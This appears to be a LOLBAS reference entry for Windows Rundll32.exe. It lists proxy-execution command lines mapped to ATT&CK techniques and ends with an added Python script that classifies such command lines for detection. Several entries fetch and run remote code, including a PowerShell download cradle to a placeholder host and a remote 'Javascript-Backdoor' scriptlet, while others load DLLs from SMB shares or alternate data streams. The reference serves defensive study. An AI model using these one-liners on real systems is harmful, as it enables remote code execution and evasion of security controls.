Rundll32.exe


Used by Windows to execute DLL files.



Execute

  1. AllTheThingsx64 is a .DLL file and EntryPoint is the name of the entry point in the .DLL file to execute.

    rundll32.exe AllTheThingsx64,EntryPoint

    Use case: Execute DLL file
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1218.011
    Tags: Execute: DLL. This LOLBAS executes Dynamic-Link Libraries (DLLs).
  2. Use Rundll32.exe to execute a DLL from an SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.

    rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint

    Use case: Execute DLL from SMB share.
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1218.011
    Tags: Execute: DLL. This LOLBAS executes Dynamic-Link Libraries (DLLs).
  3. Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

    Use case: Execute code from Internet
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1218.011
  4. Use Rundll32.exe to execute a JavaScript script that runs calc.exe.

    rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

    Use case: Proxy execution
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1218.011
  5. Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

    Use case: Proxy execution
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1218.011
  6. Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

    Use case: Execute code from Internet
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1218.011
  7. Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.

    rundll32.exe -sta {CLSID}

    Use case: Execute a DLL/EXE COM server payload or ScriptletURL code.
    Privileges required: User
    Operating systems: Windows 10 (and likely previous versions), Windows 11
    ATT&CK® technique: T1218.011
    Tags: Execute: DLL. This LOLBAS executes Dynamic-Link Libraries (DLLs).

Alternate data streams

  1. Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).

    rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain

    Use case: Execute code from alternate data stream
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1564.004
    Tags: Execute: DLL. This LOLBAS executes Dynamic-Link Libraries (DLLs).
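
Detection-side triage for the command-line shapes listed above, as an added example that is not part of the original entry: it sorts process-creation command lines into the categories this page describes so that the UNC, script, COM and ADS shapes can be alerted on separately from ordinary DLL launches. The labels, the `classify`/`triage` names and the last two sample lines are assumptions made for illustration; the script sample is truncated from the entry above.

```python
import re

# Image at the start of a process command line: quoted or not, optional path without spaces.
IMAGE = re.compile(r'^\s*"?(?:[^"\s]*?\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.I)

def classify(cmdline):
    """Return (label, ATT&CK id) for a rundll32 command line, None for anything else."""
    m = IMAGE.match(cmdline)
    if not m:
        return None
    args = m.group(1).strip()
    low = args.lower()
    # Entries 3-6: javascript: pseudo-protocol routed through mshtml's RunHTMLApplication.
    if low.startswith("javascript:") and "runhtmlapplication" in low:
        return ("script-via-mshtml", "T1218.011")
    # Entry 7: -sta followed by a CLSID or ProgID.
    if re.match(r"-sta\s", low):
        return ("com-server-sta", "T1218.011")
    # Otherwise the DLL path is everything before the first comma.
    target = args.split(",", 1)[0].strip(' "')
    if target.startswith("\\\\"):
        return ("dll-from-unc-share", "T1218.011")
    # A colon left after removing the drive letter is a stream name (ADS).
    if ":" in re.sub(r"^[A-Za-z]:", "", target):
        return ("dll-in-ads", "T1564.004")
    # Entry 1 shape: common in normal use, so baseline it rather than alert on it.
    return ("dll-entrypoint", "T1218.011")

# Command lines from the entries above (script body truncated), then two constructed ones.
SAMPLES = [
    r'rundll32.exe AllTheThingsx64,EntryPoint',
    r'rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
    r'rundll32.exe -sta {CLSID}',
    r'rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',  # constructed
    r'notepad.exe C:\notes.txt',                                       # constructed
]

def triage(lines):
    """Classify each command line, preserving input order."""
    return [classify(line) for line in lines]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLES, triage(SAMPLES)):
        print(verdict, "<-", line)
```

In telemetry that reports the image path separately from the command line (for example a process-creation event), match on the image field first and pass only the arguments through the same checks.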